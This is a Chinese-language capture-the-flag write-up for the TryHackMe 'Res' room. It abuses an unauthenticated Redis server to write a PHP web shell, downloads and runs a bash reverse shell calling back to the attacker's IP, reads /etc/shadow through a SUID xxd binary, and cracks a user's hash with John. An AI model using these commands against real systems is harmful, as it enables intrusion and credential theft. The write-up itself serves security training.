今天這一題是針對 Redis 服務的攻擊，對於打膩 Web 的人應該會覺得滿有趣的(?)。

• 網址：https://tryhackme.com/room/res
• IP ： 10.10.149.195

掃 Port

• 先來老梗的 nmap -A 10.10.149.195

  •   Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-01 01:29 EDT
      Nmap scan report for 10.10.149.195
      Host is up (0.29s latency).
      Not shown: 999 closed ports
      PORT   STATE SERVICE VERSION
      80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
      |_http-server-header: Apache/2.4.18 (Ubuntu)
      |_http-title: Apache2 Ubuntu Default Page: It works
      ![](https://i.imgur.com/3PG5lnw.png)
    

  • 只看到開啟 80 Port
• python3 dirsearch.py -u http://10.10.149.195/ -e all
  • 發現完全沒東西
• 我們試著對所有 Port 進行掃描
  • nmap 如果不帶參數只會掃常見的 port 而已
  • nmap -p- 10.10.149.195
    • 
    • 發現有開 6379 port
• 問題
  • Scan the machine, how many ports are open
    • 2 個 Port
    • 80 與 6379
  • What's is the database management system installed on the server?
    • 6379 是 redis
  • What port is the database management system running on?
    • 6379
• 透過 nmap -A 觀察版本
  • nmap -p6379 -A 10.10.149.195
  • 
  • 可以看到是 6.0.7
• 問題
  • What's is the version of management system installed on the server?
  • 6.0.7

寫入 Shell

• 使用 redis cli 進行連線
  • redis-cli -h 10.10.149.195
    • 連線
• 寫入 phpinfo 測試
  • config set dir "/var/www/html"
    • 設定寫入路徑為 /var/www/html
  • config set dbfilename meow.php
    • 設定檔名為 meow.php
  • set x "\r\n\r\n<?php phpinfo();?>\r\n\r\n"
    • 檔案內容為 phpinfo
  • save
  • 用瀏覽器訪問 /meow.php
    • 
    • 發現可以順利地看到 phpinfo
• 寫入 web shell
  • config set dbfilename shell.php
  • set x "\r\n\r\n<?php system($_GET[A]);?>\r\n\r\n"
  • save
  • 
    • 可以順利的使用 Webshell

Reverse shell

• 本地端準備
  • bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'
  • 存在 s 檔案中
  • 並使用 python3 -m http.server 開啟網頁伺服器
• 遠端下載 shell 檔案
  • http://10.10.149.195/shell.php?A=wget 10.13.21.55:8000/s -O /tmp/s
• 執行 reverse shell
  • 本地端準備 nc -vlk 7877
  • 訪問 http://10.10.149.195/shell.php?A=bash%20/tmp/s
  • 
    • 成功接上 reverse shell!!
• 取得 user flag
  • 檔案在 /home/vianka/user.txt
  • 

提權

• 使用 Linpeas
  • wget 10.13.21.55:8000/linpeas.sh
    • 下載 linpeas
  • bash linpeas.sh | tee out.txt
    • 執行
  • 發現有標顏色的 suid
    • 
    • 我們發現 xxd 可以用來提權
• GTFobins 找到 SUID xxd 讀檔
  • https://gtfobins.github.io/gtfobins/xxd/#suid
  • 要破解密碼的話可以破 /etc/shadow 的 hash
    • LFILE=/etc/shadow
    • xxd "$LFILE" | xxd -r
    • 可以順利回傳 /etc/shadow
    • 
    • `

爆破密碼

• 複製 vianka 的 hash 到本地端

  • vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::

• 呼叫約翰破密碼

  • john j.txt --wordlist=/opt/rockyou.txt
  • 
  • 成功破解密碼為 beautiful1

• 切換使用者

  • su vianka
    • 切換使用者，並切換密碼為 beautiful1
    • 

• 再次提權起手式

  • 輸入 sudo -l
  • 
    • 發現使用者可以用 sudo

• 使用 sudo su 切換到 root

  • 成功取得 root flag
  •